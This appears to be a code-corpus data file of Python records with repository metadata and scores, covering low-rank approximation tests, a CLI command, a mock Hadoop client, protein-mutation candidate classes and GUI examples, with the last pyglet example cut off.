import numpy as np import os import pickle import pytest import scipy.stats as st import wlra from fixtures import * # This is needed to get functions not publicly exported from wlra.wlra import lra from wlra.nmf import nmf def test_lra_shape(): x = np.zeros((100, 200)) res = lra(x, rank=1) assert res.shape == (100, 200) def test_lra_value(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = lra(x, rank=1) u, d, vt = np.linalg.svd(x, full_matrices=False) res0 = u[:,:1].dot(vt[:1]) * d[0] # Important: numpy/scipy give differences which can differ considerably for # individual elements. Instead, check that the objective values are close assert np.isclose(np.linalg.norm(x - res), np.linalg.norm(x - res0), atol=0.1) def test_wlra_shape(): x = np.zeros((100, 200)) w = np.ones((100, 200)) res = wlra.wlra(x, w, rank=1) assert res.shape == (100, 200) def test_wlra_unit_weight(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = wlra.wlra(x, w=1, rank=1) res0 = lra(x, rank=1) assert np.isclose(res, res0).all() def test_wlra_rank_2(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = wlra.wlra(x, w=1, rank=2) res0 = lra(x, rank=2) assert np.isclose(res, res0).all() def test_wlra_missing(simulate): x, eta = simulate w = (np.random.uniform(size=x.shape) < 0.1).astype(float) wlra.wlra(x, w, rank=3) def test_plra_shape(): x = np.ones((100, 200)) res = wlra.plra(x, 1) assert res.shape == (100, 200) def test_plra_assume_rank_1(): x = np.random.poisson(lam=np.exp(np.random.normal(size=(100, 200)))) res = wlra.plra(x, 1) def test_plra_oracle(simulate): x, eta = simulate l1 = st.poisson(mu=np.exp(wlra.plra(x, rank=3, max_outer_iters=100, check_converged=True))).logpmf(x).sum() l0 = st.poisson(mu=np.exp(eta)).logpmf(x).sum() assert l1 > l0 def test_plra1_oracle(simulate): x, eta = simulate l1 = st.poisson(mu=np.exp(wlra.plra(x, rank=3, max_outer_iters=1))).logpmf(x).sum() l0 = st.poisson(mu=np.exp(eta)).logpmf(x).sum() assert l1 > l0 def test_plra_mask(simulate): x, eta = simulate mask = np.random.uniform(size=x.shape) < 0.25 x = np.ma.masked_array(x, mask=mask) res = wlra.plra(x, 3) @pytest.mark.skip('dummy test') def test_plra1_10x(): import scmodes x = scmodes.dataset.read_10x(f'/project2/mstephens/aksarkar/projects/singlecell-ideas/data/10xgenomics/b_cells/filtered_matrices_mex/hg19/', return_df=True) res = wlra.plra(x.values, rank=10, verbose=True)
en
0.883703
# This is needed to get functions not publicly exported # Important: numpy/scipy give differences which can differ considerably for # individual elements. Instead, check that the objective values are close
1.886703
2
askoclics/cli/commands/file/describe.py
mboudet/askoclics
0
6618589
import click from askoclics.cli.cli import pass_context, json_loads from askoclics.cli.decorators import custom_exception, list_output @click.command('describe') @click.argument("files", type=str) @pass_context @custom_exception @list_output def cli(ctx, files): """Show file information Output: List of files containing info """ return ctx.gi.file.describe(files)
import click from askoclics.cli.cli import pass_context, json_loads from askoclics.cli.decorators import custom_exception, list_output @click.command('describe') @click.argument("files", type=str) @pass_context @custom_exception @list_output def cli(ctx, files): """Show file information Output: List of files containing info """ return ctx.gi.file.describe(files)
en
0.726722
Show file information Output: List of files containing info
2.043722
2
bigflow_python/python/bigflow/test/mock_hadoop_client.py
advancedxy/bigflow_python
1,236
6618590
<gh_stars>1000+ # Copyright (c) 2017 Baidu, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #!/bin/env python """ mock hadoop client module """ import json import argparse import json import os import sys import uuid class HadoopCmd(object): """ Hadoop Cmd """ def __init__(self, args): parser = argparse.ArgumentParser('hadoop') parser.add_argument('-conf', action='append') parser.add_argument('-jobconf', dest='jobconf', action='append') parser.add_argument('-D', dest='jobconf', action='append') parser.add_argument('-get', dest='fs_op', action='store_const', const='get') parser.add_argument('-put', dest='fs_op', action='store_const', const='put') parser.add_argument('-du', dest='fs_op', action='store_const', const='du') parser.add_argument('-status', dest='counter_op', action='store_const', const='status') parser.add_argument('-rmr', dest='fs_op', action='store_const', const='rmr') parser.add_argument('-touchz', dest='fs_op', action='store_const', const='touchz') parser.add_argument('-test', dest='fs_op', action='store_const', const='test') parser.add_argument('-e', action='store_true') parser.add_argument('-cacheArchive', dest='cache_archive', action='append') parser.add_argument('-cacheFile', dest='cache_file', action='append') parser.add_argument('-mapdebug', nargs='?') parser.add_argument('-reducedebug', nargs='?') parser.add_argument('-input', nargs='?') parser.add_argument('-output', nargs='?') parser.add_argument('-vertex', nargs='?') parser.add_argument('-file', action='append') parser.add_argument('remain', nargs = argparse.REMAINDER) parsed = parser.parse_args(args[1:]) self.type = args[0] self.fs_op = parsed.fs_op if parsed.jobconf is None: parsed.jobconf = [] self.jobconf = dict(s.split('=') for s in parsed.jobconf) self.cache_archive = parsed.cache_archive self.cache_file = parsed.cache_file self.remain = parsed.remain self.file = parsed.file def vertex_num(self): """ get vertex num """ return int(self.jobconf['abaci.dag.vertex.num']) def vertex_memory(self, num, dft=None): """ get vertex memory """ ret = self.jobconf.get('hadoop.hce.memory.limit.%d' % num, None) if ret is None: return dft else: return int(ret) def vertex_concurrency(self, num, dft=None): """ get vertex concurrency """ ret = self.jobconf.get('mapred.reduce.tasks.%d' % num, None) ret = self.jobconf.get('mapred.map.tasks.%d' % num, ret) if ret is None: return dft else: return int(ret) def __str__(self): return str(self.__dict__) import os tmp_path = os.path.dirname(os.path.abspath(__file__)) + '/bigflow-hadoop-cmds' class MockHadoopClient(object): """ MockHadoopClient """ def __init__(self): self._uuid = str(uuid.uuid4()) self.hadoop_cmd_file = tmp_path + "." + self._uuid abs_dir = os.path.dirname(os.path.abspath(__file__)) self.mock_hadoop_client_path = os.path.join(abs_dir, "mock_hadoop_client.py_" + self._uuid) # os.path.abspath(__file__) could be mock_hadoop_client.pyc os.link(os.path.join(abs_dir, "mock_hadoop_client.py"), self.mock_hadoop_client_path) def reset(self): if os.path.isfile(self.hadoop_cmd_file): os.remove(self.hadoop_cmd_file) def __del__(self): if os.path.exists(self.mock_hadoop_client_path): os.unlink(self.mock_hadoop_client_path) if os.path.isfile(self.hadoop_cmd_file): os.remove(self.hadoop_cmd_file) def recent_cmds(self, fn=None): """ get all cmds """ if fn is None: fn = lambda arg: True args = map(json.loads, file(self.hadoop_cmd_file)) args = [HadoopCmd(arg) for arg in args] return filter(fn, args) def recent_fs_cmds(self): """ get recent fs cmds """ return self.recent_cmds(lambda arg: arg.type == 'fs') def recent_job_cmds(self): """ get recent job cmds """ return self.recent_cmds(lambda arg: arg.type == 'hce') if __name__ == "__main__": hadoop_cmd_file = tmp_path mock_client_name = "mock_hadoop_client.py" client_pos = sys.argv[0].find(mock_client_name) if client_pos >= 0 and len(sys.argv[0][client_pos + len(mock_client_name):]): _uuid = sys.argv[0][client_pos + len(mock_client_name) + 1:] hadoop_cmd_file = hadoop_cmd_file + "." + _uuid ofile = open(hadoop_cmd_file, 'a+') print >> ofile, json.dumps(sys.argv[1:])
# Copyright (c) 2017 Baidu, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #!/bin/env python """ mock hadoop client module """ import json import argparse import json import os import sys import uuid class HadoopCmd(object): """ Hadoop Cmd """ def __init__(self, args): parser = argparse.ArgumentParser('hadoop') parser.add_argument('-conf', action='append') parser.add_argument('-jobconf', dest='jobconf', action='append') parser.add_argument('-D', dest='jobconf', action='append') parser.add_argument('-get', dest='fs_op', action='store_const', const='get') parser.add_argument('-put', dest='fs_op', action='store_const', const='put') parser.add_argument('-du', dest='fs_op', action='store_const', const='du') parser.add_argument('-status', dest='counter_op', action='store_const', const='status') parser.add_argument('-rmr', dest='fs_op', action='store_const', const='rmr') parser.add_argument('-touchz', dest='fs_op', action='store_const', const='touchz') parser.add_argument('-test', dest='fs_op', action='store_const', const='test') parser.add_argument('-e', action='store_true') parser.add_argument('-cacheArchive', dest='cache_archive', action='append') parser.add_argument('-cacheFile', dest='cache_file', action='append') parser.add_argument('-mapdebug', nargs='?') parser.add_argument('-reducedebug', nargs='?') parser.add_argument('-input', nargs='?') parser.add_argument('-output', nargs='?') parser.add_argument('-vertex', nargs='?') parser.add_argument('-file', action='append') parser.add_argument('remain', nargs = argparse.REMAINDER) parsed = parser.parse_args(args[1:]) self.type = args[0] self.fs_op = parsed.fs_op if parsed.jobconf is None: parsed.jobconf = [] self.jobconf = dict(s.split('=') for s in parsed.jobconf) self.cache_archive = parsed.cache_archive self.cache_file = parsed.cache_file self.remain = parsed.remain self.file = parsed.file def vertex_num(self): """ get vertex num """ return int(self.jobconf['abaci.dag.vertex.num']) def vertex_memory(self, num, dft=None): """ get vertex memory """ ret = self.jobconf.get('hadoop.hce.memory.limit.%d' % num, None) if ret is None: return dft else: return int(ret) def vertex_concurrency(self, num, dft=None): """ get vertex concurrency """ ret = self.jobconf.get('mapred.reduce.tasks.%d' % num, None) ret = self.jobconf.get('mapred.map.tasks.%d' % num, ret) if ret is None: return dft else: return int(ret) def __str__(self): return str(self.__dict__) import os tmp_path = os.path.dirname(os.path.abspath(__file__)) + '/bigflow-hadoop-cmds' class MockHadoopClient(object): """ MockHadoopClient """ def __init__(self): self._uuid = str(uuid.uuid4()) self.hadoop_cmd_file = tmp_path + "." + self._uuid abs_dir = os.path.dirname(os.path.abspath(__file__)) self.mock_hadoop_client_path = os.path.join(abs_dir, "mock_hadoop_client.py_" + self._uuid) # os.path.abspath(__file__) could be mock_hadoop_client.pyc os.link(os.path.join(abs_dir, "mock_hadoop_client.py"), self.mock_hadoop_client_path) def reset(self): if os.path.isfile(self.hadoop_cmd_file): os.remove(self.hadoop_cmd_file) def __del__(self): if os.path.exists(self.mock_hadoop_client_path): os.unlink(self.mock_hadoop_client_path) if os.path.isfile(self.hadoop_cmd_file): os.remove(self.hadoop_cmd_file) def recent_cmds(self, fn=None): """ get all cmds """ if fn is None: fn = lambda arg: True args = map(json.loads, file(self.hadoop_cmd_file)) args = [HadoopCmd(arg) for arg in args] return filter(fn, args) def recent_fs_cmds(self): """ get recent fs cmds """ return self.recent_cmds(lambda arg: arg.type == 'fs') def recent_job_cmds(self): """ get recent job cmds """ return self.recent_cmds(lambda arg: arg.type == 'hce') if __name__ == "__main__": hadoop_cmd_file = tmp_path mock_client_name = "mock_hadoop_client.py" client_pos = sys.argv[0].find(mock_client_name) if client_pos >= 0 and len(sys.argv[0][client_pos + len(mock_client_name):]): _uuid = sys.argv[0][client_pos + len(mock_client_name) + 1:] hadoop_cmd_file = hadoop_cmd_file + "." + _uuid ofile = open(hadoop_cmd_file, 'a+') print >> ofile, json.dumps(sys.argv[1:])
en
0.802014
# Copyright (c) 2017 Baidu, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #!/bin/env python mock hadoop client module Hadoop Cmd get vertex num get vertex memory get vertex concurrency MockHadoopClient # os.path.abspath(__file__) could be mock_hadoop_client.pyc get all cmds get recent fs cmds get recent job cmds
2.044075
2
i18nize/utils.py
iktw/i18nize
0
6618591
def green_string(s): return "\033[1;32;40m{}\033[0m".format(s) def red_color(s): return "\033[1;31;40m{}\033[0m".format(s)
def green_string(s): return "\033[1;32;40m{}\033[0m".format(s) def red_color(s): return "\033[1;31;40m{}\033[0m".format(s)
none
1
2.324603
2
lambo/candidate.py
samuelstanton/lambo
10
6618592
<filename>lambo/candidate.py<gh_stars>1-10 import copy import uuid from Bio import PDB from pathlib import Path from lambo.tasks.proxy_rfp.foldx import FoldxManager from lambo.tasks.proxy_rfp.sasa import SurfaceArea from Bio.SeqUtils import seq1 from lambo.utils import StringSubstitution, StringDeletion, StringInsertion, FoldxMutation def apply_mutation(base_seq, mut_pos, mut_res, tokenizer): tokens = tokenizer.decode(tokenizer.encode(base_seq)).split(" ")[1:-1] mut_seq = "".join(tokens[:mut_pos] + [mut_res] + tokens[(mut_pos + 1):]) return mut_seq def pdb_to_residues(pdb_path, chain_id='A'): """ :param pdb_path: path to pdb file (str or Path) :param chain_id: (str) :return: residues: (Bio.Seq) :return: idxs: (list) residue indexes in the PDB """ parser = PDB.PDBParser() pdb_path = Path(pdb_path).expanduser() struct = parser.get_structure(pdb_path.stem, pdb_path) chain_residues = { chain.get_id(): seq1(''.join(x.resname for x in chain)) for chain in struct.get_chains() } chain_idxs = { chain.get_id(): [x.get_id()[1] for x in chain] for chain in struct.get_chains() } residues = chain_residues[chain_id] idxs = chain_idxs[chain_id] return residues, idxs class StringCandidate: def __init__(self, wild_seq, mutation_list, tokenizer, wild_name=None, dist_from_wild=0.): self.wild_residue_seq = wild_seq self.uuid = uuid.uuid4().hex self.wild_name = 'unnamed' if wild_name is None else wild_name self.mutant_residue_seq = self.apply_mutations(mutation_list, tokenizer) self.dist_from_wild = dist_from_wild self.tokenizer = tokenizer def __len__(self): tok_idxs = self.tokenizer.encode(self.mutant_residue_seq) return len(tok_idxs) def apply_mutations(self, mutation_list, tokenizer): if len(mutation_list) == 0: return self.wild_residue_seq mutant_seq = copy.deepcopy(self.wild_residue_seq) mutant_seq = tokenizer.encode(mutant_seq)[1:-1] for mutation_op in mutation_list: old_tok_idx = mutation_op.old_token_idx mut_pos = mutation_op.token_pos if mut_pos < len(mutant_seq): assert old_tok_idx == mutant_seq[mut_pos], str(mutation_op) if isinstance(mutation_op, StringSubstitution): new_tok_idx = mutation_op.new_token_idx mutant_seq = mutant_seq[:mut_pos] + [new_tok_idx] + mutant_seq[mut_pos + 1:] elif isinstance(mutation_op, StringDeletion): mutant_seq = mutant_seq[:mut_pos] + mutant_seq[mut_pos + 1:] elif isinstance(mutation_op, StringInsertion): new_tok_idx = mutation_op.new_token_idx mutant_seq = mutant_seq[:mut_pos] + [new_tok_idx] + mutant_seq[mut_pos:] else: raise RuntimeError('unrecognized mutation op') mutant_seq = tokenizer.decode(mutant_seq).replace(" ", "") return mutant_seq def new_candidate(self, mutation_list, tokenizer): cand_kwargs = dict( wild_seq=self.mutant_residue_seq, mutation_list=mutation_list, tokenizer=tokenizer, wild_name=self.wild_name, dist_from_wild=self.dist_from_wild + len(mutation_list), ) return StringCandidate(**cand_kwargs) class FoldedCandidate: def __init__(self, work_dir, wild_pdb_path, mutation_list, tokenizer, skip_minimization=True, chain='A', wild_name=None, dist_from_wild=0.): """ :param work_dir: (str or Path) output directory :param wild_pdb_path: (str or Path) path to pdb file (recommended to use FoldX repaired PDBs) :param mutation_list: list of Mutation named tuples :param skip_minimization: (bool) set to False to repair the wild PDB """ self.work_dir = work_dir self.uuid = uuid.uuid4().hex self.mutation_list = mutation_list self.tokenizer = tokenizer self.chain = chain self.wild_name = 'unnamed' if wild_name is None else wild_name self.dist_from_wild = dist_from_wild foldx_manager = FoldxManager(wt_pdb=wild_pdb_path, work_dir=work_dir, skip_minimization=skip_minimization) # pass dummy mutation to foldx_manager if mutation_list is empty if len(mutation_list) == 0: wild_seq, wild_idxs = pdb_to_residues(wild_pdb_path, self.chain) tokens = tokenizer.encode(wild_seq)[1:-1] mutation_list = [ # FoldxMutation(wild_seq[0], self.chain, wild_idxs[0], wild_seq[0]) FoldxMutation(tokens[0], chain, wild_idxs[0], tokens[0], tokenizer) ] foldx_success = True try: metrics = foldx_manager(mutation_list, self.uuid) self.wild_pdb_path = Path(work_dir) / self.uuid / 'WT_wt_input_Repair_1.pdb' self.mutant_pdb_path = Path(work_dir) / self.uuid / 'wt_input_Repair_1.pdb' except RuntimeError: print(f'{wild_name}, {mutation_list}') foldx_success = False self.wild_pdb_path = wild_pdb_path self.mutant_pdb_path = None # predicted stability self.wild_total_energy = metrics['wild_total_energy'] if foldx_success else float('inf') self.mutant_total_energy = metrics['mutant_total_energy'] if foldx_success else float('inf') # solvent-accessible surface area sasa_fn = SurfaceArea() self.wild_surface_area = sasa_fn(self.uuid, self.wild_pdb_path) self.mutant_surface_area = sasa_fn(self.uuid, self.mutant_pdb_path) if foldx_success else -float('inf') # residue sequences self.wild_residue_seq, self.wild_residue_idxs = pdb_to_residues( self.wild_pdb_path, self.chain ) self.mutant_residue_seq, self.mutant_residue_idxs = pdb_to_residues( self.mutant_pdb_path, self.chain ) if foldx_success else (None, None) def __len__(self): tok_idxs = self.tokenizer.encode(self.mutant_residue_seq) return len(tok_idxs) def new_mutation(self, seq_idx, mutant_residue, mutation_type='sub'): """ formats the desired sequence substitution into a compatible FoldX mutation object :param seq_idx: position in the residue sequence :param mutant_residue: residue to be substituted :return: Mutation """ assert mutation_type == 'sub', 'Foldx only allows substitutions' seq_idx = seq_idx % len(self.mutant_residue_seq) # make indexes wrap around mutation_kwargs = dict( old_token_idx=self.tokenizer.encode(self.mutant_residue_seq[seq_idx])[1], chain=self.chain, token_pos=self.mutant_residue_idxs[seq_idx], new_token_idx=self.tokenizer.encode(mutant_residue)[1], tokenizer=self.tokenizer, ) return FoldxMutation(**mutation_kwargs) def new_candidate(self, mutation_list): """ Mutates the current mutant type into a new mutant type. Mutations should be formatted with `self.new_mutation` :param mutation_list: [Mutation objects] :return: MutationCandidate """ mutation_ops = [] for op in mutation_list: if isinstance(op, FoldxMutation): mutation_ops.append(op) elif isinstance(op, StringSubstitution): mutation_ops.append(self.new_mutation( op.token_pos, op.new_token, mutation_type='sub' )) else: raise ValueError cand_kwargs = dict( work_dir=self.work_dir, wild_pdb_path=self.mutant_pdb_path, mutation_list=mutation_ops, tokenizer=self.tokenizer, skip_minimization=True, chain=self.chain, wild_name=self.wild_name, dist_from_wild=self.dist_from_wild + len(mutation_ops), ) return FoldedCandidate(**cand_kwargs)
<filename>lambo/candidate.py<gh_stars>1-10 import copy import uuid from Bio import PDB from pathlib import Path from lambo.tasks.proxy_rfp.foldx import FoldxManager from lambo.tasks.proxy_rfp.sasa import SurfaceArea from Bio.SeqUtils import seq1 from lambo.utils import StringSubstitution, StringDeletion, StringInsertion, FoldxMutation def apply_mutation(base_seq, mut_pos, mut_res, tokenizer): tokens = tokenizer.decode(tokenizer.encode(base_seq)).split(" ")[1:-1] mut_seq = "".join(tokens[:mut_pos] + [mut_res] + tokens[(mut_pos + 1):]) return mut_seq def pdb_to_residues(pdb_path, chain_id='A'): """ :param pdb_path: path to pdb file (str or Path) :param chain_id: (str) :return: residues: (Bio.Seq) :return: idxs: (list) residue indexes in the PDB """ parser = PDB.PDBParser() pdb_path = Path(pdb_path).expanduser() struct = parser.get_structure(pdb_path.stem, pdb_path) chain_residues = { chain.get_id(): seq1(''.join(x.resname for x in chain)) for chain in struct.get_chains() } chain_idxs = { chain.get_id(): [x.get_id()[1] for x in chain] for chain in struct.get_chains() } residues = chain_residues[chain_id] idxs = chain_idxs[chain_id] return residues, idxs class StringCandidate: def __init__(self, wild_seq, mutation_list, tokenizer, wild_name=None, dist_from_wild=0.): self.wild_residue_seq = wild_seq self.uuid = uuid.uuid4().hex self.wild_name = 'unnamed' if wild_name is None else wild_name self.mutant_residue_seq = self.apply_mutations(mutation_list, tokenizer) self.dist_from_wild = dist_from_wild self.tokenizer = tokenizer def __len__(self): tok_idxs = self.tokenizer.encode(self.mutant_residue_seq) return len(tok_idxs) def apply_mutations(self, mutation_list, tokenizer): if len(mutation_list) == 0: return self.wild_residue_seq mutant_seq = copy.deepcopy(self.wild_residue_seq) mutant_seq = tokenizer.encode(mutant_seq)[1:-1] for mutation_op in mutation_list: old_tok_idx = mutation_op.old_token_idx mut_pos = mutation_op.token_pos if mut_pos < len(mutant_seq): assert old_tok_idx == mutant_seq[mut_pos], str(mutation_op) if isinstance(mutation_op, StringSubstitution): new_tok_idx = mutation_op.new_token_idx mutant_seq = mutant_seq[:mut_pos] + [new_tok_idx] + mutant_seq[mut_pos + 1:] elif isinstance(mutation_op, StringDeletion): mutant_seq = mutant_seq[:mut_pos] + mutant_seq[mut_pos + 1:] elif isinstance(mutation_op, StringInsertion): new_tok_idx = mutation_op.new_token_idx mutant_seq = mutant_seq[:mut_pos] + [new_tok_idx] + mutant_seq[mut_pos:] else: raise RuntimeError('unrecognized mutation op') mutant_seq = tokenizer.decode(mutant_seq).replace(" ", "") return mutant_seq def new_candidate(self, mutation_list, tokenizer): cand_kwargs = dict( wild_seq=self.mutant_residue_seq, mutation_list=mutation_list, tokenizer=tokenizer, wild_name=self.wild_name, dist_from_wild=self.dist_from_wild + len(mutation_list), ) return StringCandidate(**cand_kwargs) class FoldedCandidate: def __init__(self, work_dir, wild_pdb_path, mutation_list, tokenizer, skip_minimization=True, chain='A', wild_name=None, dist_from_wild=0.): """ :param work_dir: (str or Path) output directory :param wild_pdb_path: (str or Path) path to pdb file (recommended to use FoldX repaired PDBs) :param mutation_list: list of Mutation named tuples :param skip_minimization: (bool) set to False to repair the wild PDB """ self.work_dir = work_dir self.uuid = uuid.uuid4().hex self.mutation_list = mutation_list self.tokenizer = tokenizer self.chain = chain self.wild_name = 'unnamed' if wild_name is None else wild_name self.dist_from_wild = dist_from_wild foldx_manager = FoldxManager(wt_pdb=wild_pdb_path, work_dir=work_dir, skip_minimization=skip_minimization) # pass dummy mutation to foldx_manager if mutation_list is empty if len(mutation_list) == 0: wild_seq, wild_idxs = pdb_to_residues(wild_pdb_path, self.chain) tokens = tokenizer.encode(wild_seq)[1:-1] mutation_list = [ # FoldxMutation(wild_seq[0], self.chain, wild_idxs[0], wild_seq[0]) FoldxMutation(tokens[0], chain, wild_idxs[0], tokens[0], tokenizer) ] foldx_success = True try: metrics = foldx_manager(mutation_list, self.uuid) self.wild_pdb_path = Path(work_dir) / self.uuid / 'WT_wt_input_Repair_1.pdb' self.mutant_pdb_path = Path(work_dir) / self.uuid / 'wt_input_Repair_1.pdb' except RuntimeError: print(f'{wild_name}, {mutation_list}') foldx_success = False self.wild_pdb_path = wild_pdb_path self.mutant_pdb_path = None # predicted stability self.wild_total_energy = metrics['wild_total_energy'] if foldx_success else float('inf') self.mutant_total_energy = metrics['mutant_total_energy'] if foldx_success else float('inf') # solvent-accessible surface area sasa_fn = SurfaceArea() self.wild_surface_area = sasa_fn(self.uuid, self.wild_pdb_path) self.mutant_surface_area = sasa_fn(self.uuid, self.mutant_pdb_path) if foldx_success else -float('inf') # residue sequences self.wild_residue_seq, self.wild_residue_idxs = pdb_to_residues( self.wild_pdb_path, self.chain ) self.mutant_residue_seq, self.mutant_residue_idxs = pdb_to_residues( self.mutant_pdb_path, self.chain ) if foldx_success else (None, None) def __len__(self): tok_idxs = self.tokenizer.encode(self.mutant_residue_seq) return len(tok_idxs) def new_mutation(self, seq_idx, mutant_residue, mutation_type='sub'): """ formats the desired sequence substitution into a compatible FoldX mutation object :param seq_idx: position in the residue sequence :param mutant_residue: residue to be substituted :return: Mutation """ assert mutation_type == 'sub', 'Foldx only allows substitutions' seq_idx = seq_idx % len(self.mutant_residue_seq) # make indexes wrap around mutation_kwargs = dict( old_token_idx=self.tokenizer.encode(self.mutant_residue_seq[seq_idx])[1], chain=self.chain, token_pos=self.mutant_residue_idxs[seq_idx], new_token_idx=self.tokenizer.encode(mutant_residue)[1], tokenizer=self.tokenizer, ) return FoldxMutation(**mutation_kwargs) def new_candidate(self, mutation_list): """ Mutates the current mutant type into a new mutant type. Mutations should be formatted with `self.new_mutation` :param mutation_list: [Mutation objects] :return: MutationCandidate """ mutation_ops = [] for op in mutation_list: if isinstance(op, FoldxMutation): mutation_ops.append(op) elif isinstance(op, StringSubstitution): mutation_ops.append(self.new_mutation( op.token_pos, op.new_token, mutation_type='sub' )) else: raise ValueError cand_kwargs = dict( work_dir=self.work_dir, wild_pdb_path=self.mutant_pdb_path, mutation_list=mutation_ops, tokenizer=self.tokenizer, skip_minimization=True, chain=self.chain, wild_name=self.wild_name, dist_from_wild=self.dist_from_wild + len(mutation_ops), ) return FoldedCandidate(**cand_kwargs)
en
0.696791
:param pdb_path: path to pdb file (str or Path) :param chain_id: (str) :return: residues: (Bio.Seq) :return: idxs: (list) residue indexes in the PDB :param work_dir: (str or Path) output directory :param wild_pdb_path: (str or Path) path to pdb file (recommended to use FoldX repaired PDBs) :param mutation_list: list of Mutation named tuples :param skip_minimization: (bool) set to False to repair the wild PDB # pass dummy mutation to foldx_manager if mutation_list is empty # FoldxMutation(wild_seq[0], self.chain, wild_idxs[0], wild_seq[0]) # predicted stability # solvent-accessible surface area # residue sequences formats the desired sequence substitution into a compatible FoldX mutation object :param seq_idx: position in the residue sequence :param mutant_residue: residue to be substituted :return: Mutation # make indexes wrap around Mutates the current mutant type into a new mutant type. Mutations should be formatted with `self.new_mutation` :param mutation_list: [Mutation objects] :return: MutationCandidate
2.157725
2
setup.py
WorldEditors/PaddleHelix
0
6618593
#!/usr/bin/env python # -*- coding: UTF-8 -*- ################################################################################ # # Copyright (c) 2020 Baidu.com, Inc. All Rights Reserved # ################################################################################ """ Setup script. Authors: fangxiaomin01(<EMAIL>) Date: 2020/09/18 17:58:14 """ import setuptools setuptools.setup()
#!/usr/bin/env python # -*- coding: UTF-8 -*- ################################################################################ # # Copyright (c) 2020 Baidu.com, Inc. All Rights Reserved # ################################################################################ """ Setup script. Authors: fangxiaomin01(<EMAIL>) Date: 2020/09/18 17:58:14 """ import setuptools setuptools.setup()
de
0.543317
#!/usr/bin/env python # -*- coding: UTF-8 -*- ################################################################################ # # Copyright (c) 2020 Baidu.com, Inc. All Rights Reserved # ################################################################################ Setup script. Authors: fangxiaomin01(<EMAIL>) Date: 2020/09/18 17:58:14
1.254675
1
_todo/programme/rawinput.py
sdpython/teachpyx
3
6618594
import Tkinter def question (legende) : reponse = [""] root = Tkinter.Tk () root.title ("pseudo raw_input") Tkinter.Label (text = legende).pack (side = Tkinter.LEFT) s = Tkinter.Entry (text= "def", width=80) s.pack (side = Tkinter.LEFT) def rget () : reponse [0] = s.get () root.destroy () Tkinter.Button (text = "ok", command = rget).pack (side = Tkinter.LEFT) root.mainloop () return reponse [0] print "reponse ", question ("texte de la question")
import Tkinter def question (legende) : reponse = [""] root = Tkinter.Tk () root.title ("pseudo raw_input") Tkinter.Label (text = legende).pack (side = Tkinter.LEFT) s = Tkinter.Entry (text= "def", width=80) s.pack (side = Tkinter.LEFT) def rget () : reponse [0] = s.get () root.destroy () Tkinter.Button (text = "ok", command = rget).pack (side = Tkinter.LEFT) root.mainloop () return reponse [0] print "reponse ", question ("texte de la question")
none
1
3.471815
3
examples/folding.py
LukeMS/pyglet-gui
52
6618595
<reponame>LukeMS/pyglet-gui from setup import * from pyglet_gui.manager import Manager from pyglet_gui.containers import VerticalContainer from pyglet_gui.document import Document from pyglet_gui.constants import ANCHOR_CENTER, HALIGN_LEFT from pyglet_gui.gui import SectionHeader, FoldingSection, Frame from pyglet_gui.scrollable import Scrollable from pyglet_gui.theme import Theme theme = Theme({"font": "Lucida Grande", "font_size": 12, "text_color": [255, 255, 255, 255], "gui_color": [255, 0, 0, 255], "section": { "right": { "image": { "source": "line.png", "region": [2, 0, 6, 4], "frame": [0, 4, 4, 0], "padding": [0, 0, 0, 6] } }, "font_size": 14, "opened": { "image": { "source": "book-open.png" } }, "closed": { "image": { "source": "book.png" } }, "left": { "image": { "source": "line.png", "region": [0, 0, 6, 4], "frame": [2, 4, 4, 0], "padding": [0, 0, 0, 6] } }, "center": { "image": { "source": "line.png", "region": [2, 0, 4, 4], "frame": [0, 4, 4, 0], "padding": [0, 0, 0, 6] } } }, "frame": { "image": { "source": "panel.png", "frame": [8, 8, 16, 16], "padding": [16, 16, 8, 8] } } }, resources_path='../theme/') content = Frame( Scrollable( VerticalContainer([SectionHeader("Folding"), Document("Click on the section headers below to open them.", width=300), FoldingSection("Folding 1", Document("This is the first folding.", width=300)), FoldingSection("Folding 2", Document("This is the second folding.", width=300), is_open=False), FoldingSection("Folding 3", Document("This is the third folding.", width=300), is_open=False), ], align=HALIGN_LEFT), height=400) ) Manager( content , window=window, batch=batch, anchor=ANCHOR_CENTER, theme=theme) pyglet.app.run()
from setup import * from pyglet_gui.manager import Manager from pyglet_gui.containers import VerticalContainer from pyglet_gui.document import Document from pyglet_gui.constants import ANCHOR_CENTER, HALIGN_LEFT from pyglet_gui.gui import SectionHeader, FoldingSection, Frame from pyglet_gui.scrollable import Scrollable from pyglet_gui.theme import Theme theme = Theme({"font": "Lucida Grande", "font_size": 12, "text_color": [255, 255, 255, 255], "gui_color": [255, 0, 0, 255], "section": { "right": { "image": { "source": "line.png", "region": [2, 0, 6, 4], "frame": [0, 4, 4, 0], "padding": [0, 0, 0, 6] } }, "font_size": 14, "opened": { "image": { "source": "book-open.png" } }, "closed": { "image": { "source": "book.png" } }, "left": { "image": { "source": "line.png", "region": [0, 0, 6, 4], "frame": [2, 4, 4, 0], "padding": [0, 0, 0, 6] } }, "center": { "image": { "source": "line.png", "region": [2, 0, 4, 4], "frame": [0, 4, 4, 0], "padding": [0, 0, 0, 6] } } }, "frame": { "image": { "source": "panel.png", "frame": [8, 8, 16, 16], "padding": [16, 16, 8, 8] } } }, resources_path='../theme/') content = Frame( Scrollable( VerticalContainer([SectionHeader("Folding"), Document("Click on the section headers below to 